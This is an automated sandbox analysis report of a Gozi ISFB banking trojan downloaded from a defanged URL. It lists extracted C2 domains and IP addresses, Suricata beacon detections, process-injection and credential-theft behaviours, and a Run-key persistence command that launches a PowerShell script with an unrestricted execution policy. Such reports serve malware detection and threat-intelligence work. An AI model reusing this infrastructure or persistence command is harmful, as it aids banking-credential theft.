gozi_ifsb | hxxp://ntv-play[.]com/video/04169823/tls/console-play[.]exe

Resubmissions

24-08-2021 14:49

210824-aq597d398e 1

16-08-2021 19:12

210816-ehaj4hbq12 10

Analysis

max time kernel
1203s
max time network
1194s
platform
windows10_x64
resource
win10v20210408
submitted
16-08-2021 19:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://ntv-play.com/video/04169823/tls/console-play.exe
Sample

210816-ehaj4hbq12

Score

10^/10

gozi_ifsb 1001 banker discovery persistence spyware stealer suricata trojan

Malware Config

Extracted

Family

gozi_ifsb

Botnet

1001

updates.esset.com

jensjen.in

strongbilt.cc

drauduburr.ws

besstrown.cn

druckenshtalen.mn

grantedii.co

loudam62.tk

libricee.in

burbasoftw.pw

waiseen.io

trumphujtebevrot.bit

ymxslfmppjcvwkrjtfnr.co

ohnjjxasfxgxiakhtohn.in

hnhccsotdqftyicvossk.at

xcgrdxcmfirfvignnfea.ws

umvwdtbenbinronbohcc.pw

Attributes

dga_season
10
dns_servers
107.174.86.134

107.175.127.22
exe_type
worker
server_id
12

rsa_pubkey.plain

serpent.plain

Signatures

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

Processes:

WerFault.exeWerFault.exe

description pid process target process

PID 1896 created 4072 1896 WerFault.exe chrome.exe
PID 4572 created 3596 4572 WerFault.exe chrome.exe
suricata: ET MALWARE Ursnif Variant CnC Beacon
suricata: ET MALWARE Ursnif Variant CnC Beacon
suricata
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)
suricata
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata
Downloads MZ/PE file

description	pid	process	target process
PID 1896 created 4072	1896	WerFault.exe	chrome.exe
PID 4572 created 3596	4572	WerFault.exe	chrome.exe

Executes dropped EXE 9 IoCs

Processes:

console-play.execonsole-play.tmpconsole-play.execonsole-play.tmpBouncyDotNET.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exe

pid	process
4276	console-play.exe
4528	console-play.tmp
5076	console-play.exe
4204	console-play.tmp
4868	BouncyDotNET.exe
4100	software_reporter_tool.exe
4592	software_reporter_tool.exe
4564	software_reporter_tool.exe
4200	software_reporter_tool.exe

Loads dropped DLL 8 IoCs

Processes:

BouncyDotNET.exesoftware_reporter_tool.exe

pid	process
4868	BouncyDotNET.exe
4564	software_reporter_tool.exe
4564	software_reporter_tool.exe
4564	software_reporter_tool.exe
4564	software_reporter_tool.exe
4564	software_reporter_tool.exe
4564	software_reporter_tool.exe
4564	software_reporter_tool.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ManagerMemory = "cmd /c start C:\\Users\\Admin\\ManagerMemory.lnk -ep unrestricted -file C:\\Users\\Admin\\MaskStop.ps1"	Explorer.EXE

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 27 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exechrome.exesoftware_reporter_tool.exe

description	pid	process	target process
PID 4736 set thread context of 3056	4736	powershell.exe	Explorer.EXE
PID 3056 set thread context of 3668	3056	Explorer.EXE	RuntimeBroker.exe
PID 3056 set thread context of 808	3056	Explorer.EXE	chrome.exe
PID 3056 set thread context of 1876	3056	Explorer.EXE	chrome.exe
PID 3056 set thread context of 3244	3056	Explorer.EXE	cmd.exe
PID 3056 set thread context of 736	3056	Explorer.EXE	chrome.exe
PID 3056 set thread context of 492	3056	Explorer.EXE	chrome.exe
PID 3056 set thread context of 3252	3056	Explorer.EXE	chrome.exe
PID 3244 set thread context of 4252	3244	cmd.exe	PING.EXE
PID 808 set thread context of 2124	808	chrome.exe	chrome.exe
PID 3056 set thread context of 3596	3056	Explorer.EXE	chrome.exe
PID 3056 set thread context of 4072	3056	Explorer.EXE	chrome.exe
PID 808 set thread context of 4908	808	chrome.exe	chrome.exe
PID 808 set thread context of 3128	808	chrome.exe	chrome.exe
PID 808 set thread context of 4304	808	chrome.exe	chrome.exe
PID 808 set thread context of 1552	808	chrome.exe	chrome.exe
PID 808 set thread context of 2648	808	chrome.exe	chrome.exe
PID 808 set thread context of 4964	808	chrome.exe	chrome.exe
PID 808 set thread context of 4492	808	chrome.exe	chrome.exe
PID 808 set thread context of 4100	808	chrome.exe	software_reporter_tool.exe
PID 4100 set thread context of 4592	4100	software_reporter_tool.exe	software_reporter_tool.exe
PID 4100 set thread context of 4564	4100	software_reporter_tool.exe	software_reporter_tool.exe
PID 4100 set thread context of 4200	4100	software_reporter_tool.exe	software_reporter_tool.exe
PID 808 set thread context of 4108	808	chrome.exe	chrome.exe
PID 808 set thread context of 5024	808	chrome.exe	chrome.exe
PID 808 set thread context of 4072	808	chrome.exe	chrome.exe
PID 808 set thread context of 4504	808	chrome.exe	chrome.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

4572 3596 WerFault.exe chrome.exe
1896 4072 WerFault.exe chrome.exe

pid	pid_target	process	target process
4572	3596	WerFault.exe	chrome.exe
1896	4072	WerFault.exe	chrome.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4252 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

4252 PING.EXE

pid	process
4252	PING.EXE

pid	process
4252	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.execonsole-play.tmpchrome.exechrome.exechrome.exeBouncyDotNET.exepowershell.exeExplorer.EXEchrome.exeWerFault.exe

pid	process
492	chrome.exe
492	chrome.exe
808	chrome.exe
808	chrome.exe
4480	chrome.exe
4480	chrome.exe
5064	chrome.exe
5064	chrome.exe
4668	chrome.exe
4668	chrome.exe
4204	console-play.tmp
4204	console-play.tmp
5104	chrome.exe
5104	chrome.exe
3840	chrome.exe
3840	chrome.exe
2820	chrome.exe
2820	chrome.exe
2820	chrome.exe
2820	chrome.exe
4868	BouncyDotNET.exe
4868	BouncyDotNET.exe
4736	powershell.exe
4736	powershell.exe
4736	powershell.exe
3056	Explorer.EXE
3056	Explorer.EXE
2124	chrome.exe
2124	chrome.exe
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
4572	WerFault.exe
4572	WerFault.exe
4572	WerFault.exe
4572	WerFault.exe
4572	WerFault.exe
4572	WerFault.exe
4572	WerFault.exe
4572	WerFault.exe
4572	WerFault.exe
4572	WerFault.exe
4572	WerFault.exe
4572	WerFault.exe
4572	WerFault.exe
4572	WerFault.exe
4572	WerFault.exe
4572	WerFault.exe
3056	Explorer.EXE
3056	Explorer.EXE
4572	WerFault.exe
4572	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3056 Explorer.EXE

pid	process
3056	Explorer.EXE

Suspicious behavior: MapViewOfSection 27 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exechrome.exesoftware_reporter_tool.exe

pid	process
4736	powershell.exe
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3056	Explorer.EXE
3244	cmd.exe
808	chrome.exe
3056	Explorer.EXE
3056	Explorer.EXE
808	chrome.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe
4100	software_reporter_tool.exe
4100	software_reporter_tool.exe
4100	software_reporter_tool.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

Processes:

powershell.exeExplorer.EXEWerFault.exeWerFault.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exe

description	pid	process
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE
Token: SeDebugPrivilege	4572	WerFault.exe
Token: SeDebugPrivilege	1896	WerFault.exe
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE
Token: 33	4592	software_reporter_tool.exe
Token: SeIncBasePriorityPrivilege	4592	software_reporter_tool.exe
Token: 33	4100	software_reporter_tool.exe
Token: SeIncBasePriorityPrivilege	4100	software_reporter_tool.exe
Token: 33	4564	software_reporter_tool.exe
Token: SeIncBasePriorityPrivilege	4564	software_reporter_tool.exe
Token: 33	4200	software_reporter_tool.exe
Token: SeIncBasePriorityPrivilege	4200	software_reporter_tool.exe
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE
Token: SeShutdownPrivilege	3056	Explorer.EXE
Token: SeCreatePagefilePrivilege	3056	Explorer.EXE

Suspicious use of FindShellTrayWindow 14 IoCs

Processes:

chrome.execonsole-play.tmp

pid	process
808	chrome.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe
808	chrome.exe
4204	console-play.tmp

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3056 Explorer.EXE

pid	process
3056	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 808 wrote to memory of 1876	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 1876	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 736	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 492	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 492	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe
PID 808 wrote to memory of 3252	808	chrome.exe	chrome.exe

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3668

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" http://ntv-play.com/video/04169823/tls/console-play.exe
  2⤵
  - Suspicious use of SetThreadContext
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:808
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffa10b94f50,0x7ffa10b94f60,0x7ffa10b94f70
    3⤵
    PID:1876
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1624 /prefetch:2
    3⤵
    PID:736
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1672 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:492
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2228 /prefetch:8
    3⤵
    PID:3252
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2652 /prefetch:1
    3⤵
    PID:3596
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 3596 -s 672
      4⤵
      Suspicious use of NtCreateProcessExOtherParentProcess
      Program crash
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4572
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2660 /prefetch:1
    3⤵
    PID:4072
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 4072 -s 792
      4⤵
      Suspicious use of NtCreateProcessExOtherParentProcess
      Program crash
      Suspicious use of AdjustPrivilegeToken
      PID:1896
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
    3⤵
    PID:3040
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
    3⤵
    PID:1152
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
    3⤵
    PID:3108
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
    3⤵
    PID:4012
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5276 /prefetch:8
    3⤵
    PID:4240
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5092 /prefetch:8
    3⤵
    PID:4256
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5652 /prefetch:8
    3⤵
    PID:4280
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5812 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4480
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6136 /prefetch:8
    3⤵
    PID:4596
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6724 /prefetch:8
    3⤵
    PID:4660
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6168 /prefetch:8
    3⤵
    PID:4712
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6832 /prefetch:8
    3⤵
    PID:4764
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6244 /prefetch:8
    3⤵
    PID:4816
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7024 /prefetch:8
    3⤵
    PID:4844
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6216 /prefetch:8
    3⤵
    PID:4892
- - C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
    3⤵
    PID:4952
  - - C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
      "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff66ae5a890,0x7ff66ae5a8a0,0x7ff66ae5a8b0
      4⤵
      PID:5004
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7148 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5064
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6056 /prefetch:8
    3⤵
    PID:1772
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5692 /prefetch:8
    3⤵
    PID:4140
- - C:\Users\Admin\Downloads\console-play.exe
    "C:\Users\Admin\Downloads\console-play.exe"
    3⤵
    - Executes dropped EXE
    PID:4276
  - - C:\Users\Admin\AppData\Local\Temp\is-TTD2Q.tmp\console-play.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-TTD2Q.tmp\console-play.tmp" /SL5="$601F0,5898797,953344,C:\Users\Admin\Downloads\console-play.exe"
      4⤵
      Executes dropped EXE
      PID:4528
    - - C:\Users\Admin\Downloads\console-play.exe
        
        "C:\Users\Admin\Downloads\console-play.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        
        PID:5076
      - C:\Users\Admin\AppData\Local\Temp\is-E6VFP.tmp\console-play.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-E6VFP.tmp\console-play.tmp" /SL5="$301F8,5898797,953344,C:\Users\Admin\Downloads\console-play.exe" /VERYSILENT
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:4204
        
        C:\Users\Admin\AppData\Roaming\Bouncy for .NET Helper\BouncyDotNET.exe
        
        "C:\Users\Admin\AppData\Roaming\Bouncy for .NET Helper\BouncyDotNET.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:4868
- - C:\Program Files\Google\Chrome\Application\chrome.exe
